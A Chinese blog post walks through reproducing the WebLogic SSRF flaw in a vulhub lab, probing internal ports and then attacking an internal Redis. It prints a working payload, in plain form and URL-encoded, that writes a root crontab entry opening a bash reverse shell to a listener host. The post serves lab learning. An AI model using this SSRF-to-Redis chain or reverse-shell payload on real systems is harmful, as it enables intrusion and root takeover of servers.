Weblogic SSRF漏洞

已于 2023-12-07 16:56:27 修改
阅读量37 收藏
点赞数
文章标签: 网络安全 redis
于 2023-12-07 16:52:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kugoudashenshiwo/article/details/134856880
版权

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

测试环境搭建

cd vulhub/weblogic/ssrf
docker-compose up -d

访问http://your-ip:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用。

SSRF漏洞测试 

SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp,我们在brupsuite下测试该漏洞。访问一个可以访问的IP:PORT,如http://127.0.0.1:80

探测本机端口开放情况

http://172.16.32.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

 

探测内网其他主机端口开放情况 

http://172.16.32.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.16.32.128:3306

 

攻击内网redis

查看redis ip

docker exec -it ssrf_redis_1 ip addr

探测redis 6379端口是否开启

kali开启监听端口

 

构造redis攻击脚本,并反弹shell

test

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/172.16.32.130/444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

aaa

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.16.32.130%2F4449%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

 将攻击脚本进行URL编码并拼接在URL后成功拿到shell

灰盒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Weblogic SSRF漏洞复现
huangyongkang666的博客
07-22 1152
Weblogic SSRF漏洞复现
【SSRC】Weblogic SSRF漏洞
wj33333的博客
11-17 258
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。WeblogicSSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入。首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*),可访问的端口将会得到错误,一般是返回status code(如下图)。
漏洞复现】Weblogic SSRF漏洞复现
Miraitowax
02-22 856
Weblogic SSRF漏洞原理,漏洞复现步骤详细总结及剖析
WebLogic SSRF漏洞复现
qq_36567469的博客
04-18 2795
weblogic ssrf漏洞复现
weblogic ssrf漏洞复现】
m0_71635484的博客
03-20 241
weblogic ssrf漏洞复现】
【vulhub】weblogic ssrf漏洞复现
weixin_53730939的博客
03-19 461
【vulhub】weblogic ssrf漏洞复现(详解)
[Vulhub] Weblogic SSRF 漏洞(CVE-2014-4210)
weixin_45605352的博客
07-21 4911
0x00 预备知识 01 SSRF概念: SSRF(服务端请求伪造),指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。 简单的说就是利用一个可发起网络请求的服务当作跳板来攻击其他服务 02 SSRF原理 SSRF的实质是利用存在缺陷的web应用作为代理攻击远程和本地的服务器。一般情况下, SSRF攻击的目标是外网无法访问的内部系统,黑客可以利用SSRF漏洞获取内部系统的一些信息(正是因为它是由服务端
Weblogic SSRF 漏洞(CVE-2014-4210)分析
m0_61506558的博客
11-21 922
SSRF 漏洞犹如一位隐形杀手,常年隐匿于大型站点中不起眼的角落,有非常大的威胁。国内的互联网科技公司如腾讯、阿里巴巴、华为、百度等,均出现过 SSRF漏洞,且具有一定的危害。的防御策略是否存在漏洞,攻击者是否可以绕过其防御策略,或者能否配合特殊环境下的配置,形成漏洞利用链。因此对于安全审计人员来说,更应注意 SSRF 漏洞的挖掘,除了基本的搜索。的方式去挖掘、测试,能挖掘出漏洞且不影响正常业务的方式都是好方式。不存在或者端口不存在,则返回以下信息,如图。SSRF 漏洞案例,该漏洞存在于。
Weblogic SSRF漏洞(CVE-2014-4210)
墨鱼菜鸡
05-03 80
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 关于SSRF漏洞我们就不讲了,传送门——>SSRF(服务端请求伪造)漏洞 今天我们讲的是Weblogic存在的SSRF漏洞。 该漏洞存在于:http://ip:...
WebLogic SSRF漏洞修复
11-25
WebLogic SSRF漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
WebLogic SSRF And XSS检查利用工具.exe
08-11
非常简单方便/实用的WebLogic SSRF And XSS检查利用工具
weblogic相关漏洞
05-03
weblogic相关漏洞
weblogic 漏洞统计 CVE
09-18
1.CVE-2016-0696 2.CVE-2016-0700 3.CVE-2016-0675 4.CVE-2016-3416 5.CVE-2016-0688 6.CVE-2016-0638 7.CVE-2015-2623 8.CVE-2015-4744 9.CVE-2014-2480 10.CVE-2014-2481 ...这些漏洞修复情况
雷石weblogic漏洞扫描工具
08-27
雷石weblogic漏洞扫描工具
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8230
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
redis试题按知识点归类(三)
u012728971的博客
05-13 144
十一、发布/订阅 1.Redis 的发布/订阅模型是如何工作的? 2.如何使用 Redis 作为消息队列? 3.发布/订阅在实际应用中有哪些用例? 十二、缓存策略 1.如何确定 Redis 的缓存策略? 2.Redis 的缓存替换策略有哪些? 3.如何使用 Redis 作为缓存层? 十三、客户端与生态系统 1.Redis 支持哪些编程语言的客户端? 2.Redisson 和 Jedis 有什么不同? 3.如何使用 Redis 模块? 十四、运维与管理 1.如何监控和管理 Redis
【Linux】Centos7安装Redis
最新发布
m0_72166275的博客
05-17 314
Reid 官网下载 Redis 7.2。
Redis-集群方案
A的博客
05-14 868
Cluster分片集群 : 多主多从 , 解决高并发写的问题, , Cluster 它将数据分片存储到多个节点上,并通过集群间的消息通信(PING命令)来实现数据的自动迁移和故障转移。哨兵(Sentinel)集群 : 主从集群的结构之上 , 加入了哨兵用于监控集群状态 , 主节点出现故障, 执行主从切换 , 解决高可用问题,每个 Sentinel 进程都会监控一组 Redis 实例,并通过投票选举出新的主节点。解决高并发读的问题,主节点负责写操作,从节点复制主节点的数据,并提供读服务。
vulhub weblogic ssrf漏洞
03-16
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值